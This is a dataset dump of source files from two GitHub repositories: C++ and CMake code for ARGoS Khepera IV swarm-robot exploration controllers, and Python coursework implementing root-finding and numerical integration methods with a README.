"max_line_length": 39, "num_lines": 2, "path": "/ugv_exploration/plugins/loop_functions/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#add_subdirectory(occupancy_visualizer)\nadd_subdirectory(octomap_manager)" }, { "alpha_fraction": 0.6611295938491821, "alphanum_fraction": 0.6777408719062805, "avg_line_length": 22.153846740722656, "blob_id": "c07765ed8287514d762929f4c4501e12f0e265c6", "content_id": "110ea215e033bab7157f7592c7048dbcab2f83b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 301, "license_type": "no_license", "max_line_length": 50, "num_lines": 13, "path": "/elevation_map/src/main.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cassert>\n#include <cstdlib>\n#include \"elevation_map.h\"\n\nint main (int argc, char **argv) {\n\tstd::cout << \"Making new elevation map\\n\";\n\tElevationMap *testMap = new ElevationMap(10, 15);\n\tassert(testMap != 0);\n\tstd::cout << \"Passed all assertions\\n\";\n\n\t//Given size of \n}\n" }, { "alpha_fraction": 0.8860759735107422, "alphanum_fraction": 0.8860759735107422, "avg_line_length": 39, "blob_id": "6fa51a0d07d6b4b69c553c340f1205938515ac8a", "content_id": "5aecf2b82fcef2d6f8595c51cef4d9798d229596", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 79, "license_type": "no_license", "max_line_length": 41, "num_lines": 2, "path": "/ugv_diffusion_occupancy/plugins/controllers/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "add_subdirectory(epuck_obstacleavoidance)\nadd_subdirectory(kheperaiv_occupancy)" }, { "alpha_fraction": 0.5992646813392639, "alphanum_fraction": 0.6029411554336548, "avg_line_length": 14.571428298950195, "blob_id": "d1a384d776a7047c8f1166ada997306000484be7", "content_id": "8458c0a97c39f69b4ad941dd17c55875b82d20d9", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 544, "license_type": "no_license", "max_line_length": 58, "num_lines": 35, "path": "/elevation_map/src/elevation_map.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef ELEVATION_MAP_H\n#define ELEVATION_MAP_H\n\n// Author: Turner Robbins\n// Description: Simple implementation of an elevation map.\nclass ElevationMap {\npublic:\n\tElevationMap() : m_map(0) {\n\n\t}\n\tElevationMap(int x_size, int y_size) : \n\tm_x(x_size), m_y(y_size) {\n\t\tm_map = new double*[x_size];\n\t\tfor(int i=0; i < m_x; i++) {\n\t\t\tm_map[i] = new double[y_size];\n\t\t}\n\t}\n\n\tvoid setCell(int x, int y, double val) {\n\t\tm_map[x][y] = val;\n\t}\n\n\tdouble getCell(int x, int y) {\n\t\treturn m_map[x][y];\n\t}\n\nprivate:\n\n\tdouble **m_map;\n\tint m_x;\n\tint m_y;\n};\n\n\n#endif" }, { "alpha_fraction": 0.762424886226654, "alphanum_fraction": 0.7717094421386719, "avg_line_length": 28.063491821289062, "blob_id": "79bc7f9d62ac8a47c6f98cc718273445021d4511", "content_id": "0fc7f514724a5bdd71b479cab032cdb8710e536d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 1831, "license_type": "no_license", "max_line_length": 88, "num_lines": 63, "path": "/ugv_exploration/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "cmake_minimum_required (VERSION 2.6)\n\nproject (kheperaiv_exploration)\n\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${CMAKE_SOURCE_DIR}/cmake)\n\n# Deactivate RPATH for MacOSX\nset(CMAKE_MACOSX_RPATH 0)\n\nset(Lua52_DIR)\nfind_package(Lua52)\nif(LUA52_FOUND)\n set(ARGOS_WITH_LUA ON)\n include_directories(${LUA_INCLUDE_DIR})\nendif(LUA52_FOUND)\n\n#\n# Check for ARGoS3\n#\n# Find the ARGoS package, make sure to save the ARGoS prefix\nfind_package(PkgConfig)\npkg_check_modules(ARGOS REQUIRED argos3_simulator)\nset(ARGOS_PREFIX ${ARGOS_PREFIX} CACHE INTERNAL 
\"\")\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${ARGOS_PREFIX}/share/argos3/cmake)\n# Set ARGoS include dir\ninclude_directories(${ARGOS_INCLUDE_DIRS})\n# Set ARGoS link dir\nlink_directories(${ARGOS_LIBRARY_DIRS})\n\n# Check whether all the necessary libs have been installed to compile the\n# code that depends on Qt and OpenGL\ninclude(ARGoSCheckQTOpenGL)\n\n#\n# Add repository directory to the list of includes\n# This makes it possible to say #include <argos3/...> with\n# repository includes.\n#\ninclude_directories(${CMAKE_SOURCE_DIR})\n\n# use, i.e. don't skip the full RPATH for the build tree\nset(CMAKE_SKIP_BUILD_RPATH FALSE)\n\n# when building, don't use the install RPATH already\n# (but later on when installing)\nset(CMAKE_BUILD_WITH_INSTALL_RPATH FALSE)\nset(CMAKE_INSTALL_RPATH \"${CMAKE_INSTALL_PREFIX}/lib/vicon_sdk:${CMAKE_BINARY_DIR}/lib\")\n\n# add the automatically determined parts of the RPATH\n# which point to directories outside the build tree to the install RPATH\nset(CMAKE_INSTALL_RPATH_USE_LINK_PATH TRUE)\n\n\nset(CMAKE_CXX_STANDARD 11)\nset(CMAKE_CXX_STANDARD_REQUIRED ON)\n\ninclude_directories(plugins/robots/generic/control_interface/)\ninclude_directories(plugins/loop_functions/)\ninclude_directories(plugins/controllers/)\n\nadd_subdirectory(plugins)\n\nset(CMAKE_CXX_EXTENSIONS OFF)\n" }, { "alpha_fraction": 0.6404637098312378, "alphanum_fraction": 0.6468159556388855, "avg_line_length": 38.86075973510742, "blob_id": "609abab0be981286d758d1ce726637679612d5bb", "content_id": "78cea44c30b57eb96b2ab3355cb26718a661e134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6297, "license_type": "no_license", "max_line_length": 126, "num_lines": 158, "path": "/ugv_diffusion_occupancy/plugins/controllers/kheperaiv_occupancy/kheperaiv_occupancy_controller.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "/* Include the controller definition */\n#include 
\"kheperaiv_occupancy_controller.h\"\n#include <octomap_manager.h>\n/* Function definitions for XML parsing */\n#include <argos3/core/utility/configuration/argos_configuration.h>\n/* 2D vector definition */\n#include <argos3/core/utility/math/vector2.h>\n/* Definition of ultrasound implementation */\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_ultrasound_default_sensor.h>\n/* Definition of ultrasound interface */\n#include <argos3/plugins/robots/kheperaiv/control_interface/ci_kheperaiv_ultrasound_sensor.h>\n/**/\n#include <argos3/core/utility/logging/argos_log.h>\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_measures.h>\n#include <math.h>\n#include <argos3/core/control_interface/ci_sensor.h>\n\n#include <argos3/core/control_interface/ci_sensor.h>\n#include <argos3/core/utility/math/angles.h>\n\n\n\ntypedef CCI_KheperaIVUltrasoundSensor::TReadings TReadings;\ntypedef struct CCI_KheperaIVUltrasoundSensor::SReading SReading;\n/****************************************/\n/****************************************/\n\nCKheperaOccupancy::CKheperaOccupancy() :\n m_pcWheels(NULL),\n m_pcUltrasoundSensor(NULL),\n pcOccupancy(NULL),\n m_cAlpha(10.0f),\n m_fDelta(0.5f),\n m_fWheelVelocity(2.5f),\n m_cGoStraightAngleRange(-ToRadians(m_cAlpha),\n ToRadians(m_cAlpha)),\n m_localMap(octomap::OcTree(OCTCELLSIZE)),\n m_localScan(octomap::Pointcloud()){}\n\n/****************************************/\n/****************************************/\n\nvoid CKheperaOccupancy::Init(TConfigurationNode& t_node) {\n /*\n * Get sensor/actuator handles\n *\n * The passed string (ex. \"differential_steering\") corresponds to the\n * XML tag of the device whose handle we want to have. 
For a list of\n * allowed values, type at the command prompt:\n *\n * $ argos3 -q actuators\n *\n * to have a list of all the possible actuators, or\n *\n * $ argos3 -q sensors\n *\n * to have a list of all the possible sensors.\n *\n * NOTE: ARGoS creates and initializes actuators and sensors\n * internally, on the basis of the lists provided the configuration\n * file at the <controllers><kheperaiv_diffusion><actuators> and\n * <controllers><kheperaiv_diffusion><sensors> sections. If you forgot to\n * list a device in the XML and then you request it here, an error\n * occurs.\n */\n m_pcWheels = GetActuator<CCI_DifferentialSteeringActuator >(\"differential_steering\");\n m_pcUltrasoundSensor = GetSensor <CCI_KheperaIVUltrasoundSensor >(\"kheperaiv_ultrasound\" );\n pcOccupancy = GetActuator<CCI_OccupancyActuator >(\"occupancy\");\n m_pcProximity = GetSensor <CCI_KheperaIVProximitySensor >(\"kheperaiv_proximity\" );\n m_pcPosition = GetSensor <CCI_PositioningSensor >(\"positioning\");\n\n /*\n * Parse the configuration file\n *\n * The user defines this part. 
Here, the algorithm accepts three\n * parameters and it's nice to put them in the config file so we don't\n * have to recompile if we want to try other settings.\n */\n GetNodeAttributeOrDefault(t_node, \"alpha\", m_cAlpha, m_cAlpha);\n m_cGoStraightAngleRange.Set(-ToRadians(m_cAlpha), ToRadians(m_cAlpha));\n GetNodeAttributeOrDefault(t_node, \"delta\", m_fDelta, m_fDelta);\n GetNodeAttributeOrDefault(t_node, \"velocity\", m_fWheelVelocity, m_fWheelVelocity);\n}\n\n/****************************************/\n/****************************************/\n\nvoid CKheperaOccupancy::ControlStep() {\n /**************************************/\n /***********DIFFUSION******************/\n /**************************************/\n /* Get readings from proximity sensor */\n const CCI_KheperaIVProximitySensor::TReadings& tProxReads = m_pcProximity->GetReadings();\n /* Sum them together */\n CVector2 cAccumulator;\n for(size_t i = 0; i < tProxReads.size(); ++i) {\n cAccumulator += CVector2(tProxReads[i].Value, tProxReads[i].Angle);\n }\n cAccumulator /= tProxReads.size();\n /* If the angle of the vector is small enough and the closest obstacle\n * is far enough, continue going straight, otherwise curve a little\n */\n CRadians cAngle = cAccumulator.Angle();\n if(m_cGoStraightAngleRange.WithinMinBoundIncludedMaxBoundIncluded(cAngle) &&\n (cAccumulator.Length() * 2.0) < m_fDelta ) {\n /* Go straight */\n m_pcWheels->SetLinearVelocity(m_fWheelVelocity, m_fWheelVelocity);\n }\n else {\n /* Turn, depending on the sign of the angle */\n if(cAngle.GetValue() > 0.0f) {\n m_pcWheels->SetLinearVelocity(m_fWheelVelocity, 0.0f);\n }\n else {\n m_pcWheels->SetLinearVelocity(0.0f, m_fWheelVelocity);\n }\n }\n\n /**************************************/\n /***********PointCloud*****************/\n /**************************************/\n /* Get robot position and orientation */\n CQuaternion r_angle = m_pcPosition->GetReading().Orientation;\n CRadians rob_z_rot, y, x;\n 
m_pcPosition->GetReading().Orientation.ToEulerAngles(rob_z_rot, y, x);\n /* Get readings from lidar */\n const TReadings& readings = m_pcUltrasoundSensor->GetReadings();\n /* Ray start at (0,0,0) */\n CVector3 rayStart, rayEnd;\n rayStart = m_pcPosition->GetReading().Position;\n /* Calculate ray end */\n /* The reading is in cm, rescaled to meters */\n rayEnd.Set(KHEPERAIV_ULTRASOUND_SENSORS_RING_RADIUS +\n readings[0].Value * (KHEPERAIV_ULTRASOUND_SENSORS_RING_RANGE.GetMax() - KHEPERAIV_ULTRASOUND_SENSORS_RING_RANGE.GetMin()),\n 0.0, 0.0);\n /* Rotate it around Z */\n rayEnd.RotateZ(rob_z_rot);\n /* Translation */\n rayEnd += rayStart;\n\n /* insert end point into point cloud */\n m_localScan.push_back(rayEnd.GetX(), rayEnd.GetY(), rayEnd.GetZ());\n}\n\n/****************************************/\n/****************************************/\n\n/*\n * This statement notifies ARGoS of the existence of the controller.\n * It binds the class passed as first argument to the string passed as\n * second argument.\n * The string is then usable in the configuration file to refer to this\n * controller.\n * When ARGoS reads that string in the configuration file, it knows which\n * controller class to instantiate.\n * See also the configuration files for an example of how this is used.\n */\nREGISTER_CONTROLLER(CKheperaOccupancy, \"kheperaiv_occupancy_controller\")" }, { "alpha_fraction": 0.7271317839622498, "alphanum_fraction": 0.7291989922523499, "avg_line_length": 29.480314254760742, "blob_id": "a7c888835a84b4e159c029afbf46552ff8a07f2a", "content_id": "9d8c287eac937e1f6bda3145ec26720b9f8ce7c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3870, "license_type": "no_license", "max_line_length": 94, "num_lines": 127, "path": "/ugv_exploration/plugins/controllers/kheperaiv_exploration/kheperaiv_exploration_controller.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef 
KHEPERAIV_EXPLORATION_CONTROLLER_H\n#define KHEPERAIV_EXPLORATION_CONTROLLER_H\n//INCLUDE\n\n#include <argos3/core/control_interface/ci_controller.h>\n/* Definition of the differential steering actuator */\n#include <argos3/plugins/robots/generic/control_interface/ci_differential_steering_actuator.h>\n\n/* Definition of ultrasound implementation */\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_ultrasound_default_sensor.h>\n\n/* Definition of ultrasound interface */\n#include <argos3/plugins/robots/kheperaiv/control_interface/ci_kheperaiv_ultrasound_sensor.h>\n\n/* Definition of the control interface for the position sensor and sreading */\n#include <argos3/plugins/robots/generic/control_interface/ci_positioning_sensor.h>\n\n#include <argos3/plugins/robots/kheperaiv/control_interface/ci_kheperaiv_proximity_sensor.h>\n\n/*octomap includes for OcTree & various octomap functions*/\n#include <octomap/octomap.h>\n#include <octomap/OcTree.h>\n#include <octomap/Pointcloud.h>\n\n//DEFINITIONS\nusing namespace argos;\nenum class UGV_State {\n SCAN,\n WALK,\n UPDATE\n};\n\nclass CKheperaExploration : public CCI_Controller {\n//Define public members\npublic:\n /*Class constructor*/\n CKheperaExploration();\n\n /*Class destructor*/\n virtual ~CKheperaExploration(){}\n\n /*\n * This function initializes the controller.\n * The 't_node' variable points to the <parameters> section in the XML\n * file in the <controllers><footbot_diffusion_controller> section.\n */\n virtual void Init(TConfigurationNode& t_node);\n\n /*\n * This function is called once every time step.\n * The length of the time step is set in the XML file.\n */\n virtual void ControlStep();\n\n /*\n * This function resets the controller to its state right after the\n * Init().\n * It is called when you press the reset button in the GUI.\n * In this example controller there is no need for resetting anything,\n * so the function could have been omitted. 
It's here just for\n * completeness.\n */\n virtual void Reset() {}\n\n /*\n * Called to cleanup what done by Init() when the experiment finishes.\n * In this example controller there is no need for clean anything up,\n * so the function could have been omitted. It's here just for\n * completeness.\n */\n virtual void Destroy() {\n }\n\n virtual octomap::Pointcloud &getLocalScan() { \n return m_localScan;\n }\n\n virtual void clearLocalScan() {\n m_localScan.clear();\n }\n\n\n//Define private members\nprivate:\n\t/* pointer to the lidar sensor\t*/\n\tCCI_KheperaIVUltrasoundSensor* m_pcUltrasoundSensor;\n\t/* pointer to the differential steering actuator */\n\tCCI_DifferentialSteeringActuator* m_pcWheels;\n /* pointer to the proximity sensor */\n CCI_KheperaIVProximitySensor* m_pcProximity;\n /* pointer to the position sensor */\n CCI_PositioningSensor* m_pcPosition;\n /*\n * The following variables are used as parameters for the\n * algorithm. You can set their value in the <parameters> section\n * of the XML configuration file, under the\n * <controllers><footbot_diffusion_controller> section.\n */\n\n /* Maximum tolerance for the angle between\n * the robot heading direction and\n * the closest obstacle detected. */\n CDegrees m_cAlpha;\n /* Maximum tolerance for the proximity reading between\n * the robot and the closest obstacle.\n * The proximity reading is 0 when nothing is detected\n * and grows exponentially to 1 when the obstacle is\n * touching the robot.\n */\n Real m_fDelta;\n /* Wheel speed. */\n Real m_fWheelVelocity;\n /* Angle tolerance range to go straight.\n * It is set to [-alpha,alpha]. 
*/\n CRange<CRadians> m_cGoStraightAngleRange;\n /* octomap */\n octomap::OcTree m_localMap;\n /* current position */\n CCI_PositioningSensor::SReading m_position;\n\n std::vector<CRadians> m_cAngleOffsets;\n\n octomap::Pointcloud m_localScan;\n\n UGV_State m_state;\n};\n#endif" }, { "alpha_fraction": 0.7870722413063049, "alphanum_fraction": 0.7870722413063049, "avg_line_length": 28.22222137451172, "blob_id": "fc748d0933fa1e046a60f6f9788a82a0edcb3e4a", "content_id": "9daf4a2bd903423d1f5e6de372aacbcaad6a90b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 263, "license_type": "no_license", "max_line_length": 85, "num_lines": 9, "path": "/ugv_diffusion_occupancy/plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/cmake_clean.cmake", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"occupancy_medium_automoc.cpp\"\n \"CMakeFiles/occupancy_medium_automoc\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/occupancy_medium_automoc.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" } ]
39
Yancey2126/Numerical-Analysis-
https://github.com/Yancey2126/Numerical-Analysis-
036c5dc8ca50dc11c17b28de8a621594b39254af
77902a04f27720200f15da038657a5528417ce12
5d4a9f1e53e674b2f425228da92bd156bcae2362
refs/heads/master
2021-08-08T16:23:37.823751
2017-11-10T17:40:03
2017-11-10T17:40:03
110,273,888
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4712207317352295, "alphanum_fraction": 0.49462366104125977, "avg_line_length": 22.969696044921875, "blob_id": "d8c7cfb65dc392a2d3b7ab9170ac117f044b3e79", "content_id": "ee719cc136f366c27ffa5682a07aade7ba0f8db9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1581, "license_type": "no_license", "max_line_length": 66, "num_lines": 66, "path": "/py-code/hw2_Q4(Illi).py", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\ntol = 1e-12 # If the \"residual\" |f(x_k)| < tol, stop iteration\nprintouts = True\n\ndef f(x):\n #return np.exp(x) - x - 2\n return x**2 - 2\n \ndef Illi(x0, x1):\n if x0 > x1:\n print 'Initial interval not exist!'\n\n if f(x0)*f(x1) > 0:\n print 'Same sign of interval ends!'\n\n else: \n xkm1 = x0\n xk = x1\n xk_list = [xk]\n residual_list=[abs(f(xk))] \n residual = abs(f(xk))\n\n while residual > tol:\n fkm1 = f(xkm1)\n # Define the iteration in Secant's fashion\n xkp1 = xk - ((xk - xkm1)/(f(xk) - fkm1))*f(xk)\n \n if f(xkp1) * f(xk) < 0: \n xkm1 = xk\n\n else: \n fkm1 = 1/2 * f(xkm1)\n\n xk = xkp1\n fk = f(xk)\n residual = abs(fk) \n\n if printouts:\n print xk, residual\n \n xk_list.append(xk)\n residual_list.append(residual)\n\n return xk_list, residual_list\n \nxk_list, residual_list = Illi(1., 2.)\nprint 'Number of iterations = ', len(xk_list)\n\nPlotting = True\n\nif Plotting:\n fig = plt.figure(2)\n plt.plot(xk_list,'o')\n plt.xlabel('k')\n plt.ylabel('$x_k$')\n plt.title('Illinois\\'s Method Iteration --- x_k ')\n plt.show()\n\n fig = plt.figure(3)\n plt.plot(np.log10(np.array(residual_list)),'o-')\n plt.xlabel('k')\n plt.ylabel('$\\log_{10}(r_k)$')\n plt.title('Illinois\\'s Method Iteration --- convergence rate')\n plt.show()" }, { "alpha_fraction": 0.7062314748764038, "alphanum_fraction": 0.7537091970443726, "avg_line_length": 42.956520080566406, "blob_id": 
"8359683115e9bf64a0865267cafd050357c868cd", "content_id": "e2c511d0498b042be156b6c20dac9dca0184484a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1011, "license_type": "no_license", "max_line_length": 171, "num_lines": 23, "path": "/README.md", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "# Numerical-Analysis-\nMATH/CS 514 coursework ---- University of Wisconsin Madison (Fall 2017)\n\n#### Topics to be covered include:\n* root-finding\n* interpolation\n* polynomial approximation\n* numerical differentiation\n* integration \n* numerical solution of ordinary differential equations.\n\n#### Textbook:\n* ![Suli and Mayers, An Introduction to Numerical Analysis, Cambridge University Press, 2003](https://www.amazon.com/Introduction-Numerical-Analysis-Kendall-Atkinson/dp/0471624896)\n\n#### Programming language used:\n* Python 2.7\n\n#### Code for practice:\n1. root-finding:\n * ![Newton's Method](https://github.com/Yancey2126/Numerical-Analysis-/blob/master/py-code/hw2_Q1(Newton).py)\n * ![Secant's Method](https://github.com/Yancey2126/Numerical-Analysis-/blob/master/py-code/hw2_Q2(Secant).py)\n * ![Bisection Method](https://github.com/Yancey2126/Numerical-Analysis-/blob/master/py-code/hw2_Q3(Bisc).py)\n * ![Illinois's Method](https://github.com/Yancey2126/Numerical-Analysis-/blob/master/py-code/hw2_Q4(Illi).py)\n" }, { "alpha_fraction": 0.5262828469276428, "alphanum_fraction": 0.5456821322441101, "avg_line_length": 20.31999969482422, "blob_id": "32d898e6893b31c0fcd52192fd9c241a99c09476", "content_id": "8f500c6d002868b6c72bc79f4a38f6e526f873e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1598, "license_type": "no_license", "max_line_length": 77, "num_lines": 75, "path": "/py-code/hw2_Q1(Newton).py", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport 
numpy as np\nfrom matplotlib import pyplot as plt\n\ntol = 1e-12 # If the \"residual\" |f(x_k)| < tol, stop iteration\n\ndef f(x):\n# Basic idea, superlinear convergence, comparing Newton, Secant, and Newton2:\n #return np.exp(x) - x - 2\n #return x**2 - 2\n return np.sin(x**2) + 1.02 - np.exp(-x)\n \ndef f_prime(x):\n #return np.exp(x) - 1\n #return 2*x\n return 2*x*np.cos(x**2) + np.exp(-x)\n\nx = np.linspace(-1., 5., 400)\nplt.plot(x,f(x))\nplt.plot(x,np.zeros_like(x),'k-')\nplt.xlabel('x')\nplt.ylabel('f(x)')\nplt.title('Image of f(x)')\nplt.show()\n \n \n\ndef Newton(x0):\n\n # Take an initial guess: \n xk = x0\n \n xk_list=[xk]\n residual_list=[abs(f(xk))] \n residual = abs(f(xk))\n \n \n while residual>tol:\n \n xk = xk - f(xk)/f_prime(xk)\n residual = abs(f(xk))\n \n xk_list.append(xk)\n residual_list.append(residual)\n \n print xk, residual\n \n return xk_list, residual_list\n \n \nxk_list, residual_list = Newton(x0=-1.)\n\nprint 'Number of iterations = ', len(xk_list)\n\n\nPlotting = True\n\nif Plotting:\n \n fig = plt.figure(2)\n plt.plot(xk_list,'o')\n plt.xlabel('k')\n plt.ylabel('$x_k$')\n plt.title('Newton\\'s Method Iteration --- x_k ')\n plt.legend(loc='upper right')\n plt.show()\n \n\n fig = plt.figure(3)\n plt.plot(np.log10(np.array(residual_list)),'o-')\n plt.xlabel('k')\n plt.ylabel('$\\log_{10}(r_k)$')\n plt.title('Newton\\'s Method Iteration --- x_k ')\n plt.legend(loc='upper right')\n plt.show()" }, { "alpha_fraction": 0.47633904218673706, "alphanum_fraction": 0.4955798089504242, "avg_line_length": 23.35443115234375, "blob_id": "6700c38811d62bb2848445a8ba128fdc6abe5513", "content_id": "8308420c67d86665fb7fd850c6430ead8e990eaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1923, "license_type": "no_license", "max_line_length": 67, "num_lines": 79, "path": "/py-code/hw2_Q3(Bisc).py", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "import numpy as 
np\nfrom matplotlib import pyplot as plt\n\ntol = 1e-12 # If the \"residual\" |f(x_k)| < tol, stop iteration\nprintouts = True\n\ndef f(x):\n #return np.exp(x) - x - 2\n #return x**2 - 2\n return np.sin(x**2) + 1.02 - np.exp(-x)\n \n\ndef Bisection(a0, b0):\n if a0 > b0:\n print 'Initial interval not exist!'\n \n if f(a0)*f(b0) > 0:\n print 'Same sign of interval ends'\n \n else:\n ak = a0\n bk = b0\n \n ak_list = [ak]\n bk_list = [bk]\n error_list = [abs(f(ak) - f(bk))]\n error = abs(f(ak) - f(bk))\n \n while error > tol:\n ck = (ak + bk)/2\n if f(ak)*f(ck) < 0:\n bk = ck\n else: \n ak = ck\n \n error = abs(f(ak) - f(bk))\n \n if printouts:\n print ak, bk, error\n \n ak_list.append(ak)\n bk_list.append(bk)\n error_list.append(error) \n \n return ak_list, bk_list, error_list\n \n \nak_list, bk_list, error_list = Bisection(-0.5, 0.5)\nprint 'Number of iterations = ', len(ak_list)\n \n\nPlotting = True\n\nif Plotting:\n # Plot f(x)\n x = np.linspace(1. ,2. ,400)\n fig = plt.figure(1)\n plt.plot(x,f(x))\n plt.plot(x,np.zeros_like(x),'k-')\n plt.plot(np.array(ak_list),np.zeros(len(ak_list)),'o')\n plt.plot(np.array(bk_list),np.zeros(len(ak_list)),'o')\n plt.xlabel('x')\n plt.ylabel('f(x)')\n plt.title('Bisection\\'s Method Iteration')\n plt.show()\n \n fig = plt.figure(2)\n plt.plot(ak_list,'o')\n plt.xlabel('k')\n plt.ylabel('$a_k$')\n plt.title('Bisection\\'s Method Iteration --- x_k ')\n plt.show()\n\n fig = plt.figure(3)\n plt.plot(np.log10(np.array(error_list)),'o-')\n plt.xlabel('k')\n plt.ylabel('$\\log_{10}(e_k)$')\n plt.title('Bisection\\'s Method Iteration --- convergence rate')\n plt.show()" }, { "alpha_fraction": 0.4971780478954315, "alphanum_fraction": 0.5284761190414429, "avg_line_length": 23.683544158935547, "blob_id": "a983368d3d4ad85682f09decc5b04d4e8a9e10ab", "content_id": "20fe03c3708588dbe353418e58893217d975301d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1949, "license_type": 
"no_license", "max_line_length": 72, "num_lines": 79, "path": "/py-code/Composite_Rule.py", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\n# Define the example function\ndef f(x):\n return np.sin(np.exp(x))\n #return np.sin(x)\n \n#print f(0.)\n\nx = np.linspace(0,2,400)\nplt.plot(x, f(x))\nplt.plot(x, np.zeros_like(x), \"k--\")\nplt.xlabel(\"x\")\nplt.ylabel(\"f(x)\")\nplt.title('Function f(x) = sin(e^x)')\nplt.show()\n\n# Define the Trapezoidal rule\ndef Trapezoidal(f, a, b):\n I = ((b-a)/2)*(f(a) + f(b))\n return I\n\nprint 'Trapezoidal gives ' + str(Trapezoidal(f, 0., 2.))\n\n# The Composite Trapezoidal Rule with N subintervals on [0,2]\ndef Com_Trap(N):\n I = 0\n for i in range(0, N): \n h = 2./N\n xi = i*h\n xiplus = (i + 1)*h\n #print str(xi), str(xiplus)\n Ii = Trapezoidal(f, xi, xiplus)\n #print 'On interval ' + str(i) +', Trapezoidal gives ' + str(Ii)\n I = I + Ii\n return I\n\n# Calculate with h = 1/10, 1/20, 1/40\nfor N in [20, 40, 80]:\n IN = Com_Trap(N)\n print 'with h = ' + str(2./N) +':'\n print 'Composite Trapezoidal Rule approximation is : ' + str(IN)\n I2N = Com_Trap(2*N)\n I4N = Com_Trap(4*N)\n R = (IN - I2N) / (I2N - I4N)\n print 'R ratio is: ' + str(R)\n\n\n# Code up Simpson's Rule\ndef Simpson(f, a, b):\n m = (a + b) / 2\n I = (b-a)/6*(f(a) + 4*f(m) + f(b))\n return I\n \n#print 'Simpson gives ' + str(Simpson(f, 0., 2.))\n\n# Call Simpson's in composite rules\ndef Com_Simp(N):\n I = 0\n for i in range(0, N): \n h = 2./N\n xi = i*h\n xiplus = (i + 1)*h\n #print str(xi), str(xiplus)\n Ii = Simpson(f, xi, xiplus)\n #print 'On interval ' + str(i) +', Trapezoidal gives ' + str(Ii)\n I = I + Ii\n return I\n\n# Test out\nfor N in [20, 40, 80]:\n IN = Com_Simp(N)\n print 'with h = ' + str(2./N) +':'\n print 'Composite Simpson Rule approximation is : ' + str(IN)\n I2N = Com_Simp(2*N)\n I4N = Com_Simp(4*N)\n R = (IN - I2N) / (I2N - I4N)\n print 'R ratio is: ' 
+ str(R)" }, { "alpha_fraction": 0.529411792755127, "alphanum_fraction": 0.5510543584823608, "avg_line_length": 24.394365310668945, "blob_id": "8b49669ecd9591446a308f91af7e91071507b1fa", "content_id": "695b437cbea8139b4b11a354ab8fd69a93a6913c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1802, "license_type": "no_license", "max_line_length": 77, "num_lines": 71, "path": "/py-code/hw2_Q2(Secant).py", "repo_name": "Yancey2126/Numerical-Analysis-", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\ntol = 1e-12 # If the \"residual\" |f(x_k)| < tol, stop iteration\nprintouts = True\n\ndef f(x):\n return np.sin(x**2) + 1.02 - np.exp(-x)\n \ndef Secant(x0, x1):\n # Two initial guesses\n xkm1 = x0\n xk = x1\n \n xk_list = [xk]\n residual_list=[abs(f(xk))] \n residual = abs(f(xk))\n \n while residual > tol: \n # Calculate the new xk by Secant's definition\n xkp1 = xk - ((xk - xkm1)/(f(xk) - f(xkm1)))*f(xk)\n \n # Update xkm1, xk and residual\n xkm1 = xk\n xk = xkp1\n \n residual = abs(f(xk))\n \n if printouts:\n print xk, residual\n \n # Add new iteration results into the list\n xk_list.append(xk)\n residual_list.append(residual)\n \n if len(xk_list)==200:\n print 'Did not converge after 200 iterations'\n break\n\n return xk_list, residual_list\n \nxk_list, residual_list = Secant(0.9, 1.)\nprint 'Number of iterations(Secant) = ', len(xk_list)\n\nPlotting = True\n\nif Plotting:\n # Plot f(x)\n x = np.linspace(1. ,2. 
